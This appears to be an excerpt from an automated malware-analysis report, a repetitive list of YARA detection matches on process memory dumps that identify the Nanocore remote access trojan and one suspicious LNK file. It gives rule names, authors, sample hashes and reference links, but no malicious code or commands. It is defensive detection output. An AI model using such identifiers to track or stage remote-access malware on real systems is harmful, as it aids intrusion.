      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth (Nextron Systems), description = Detects LNK file with suspicious content, score =
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
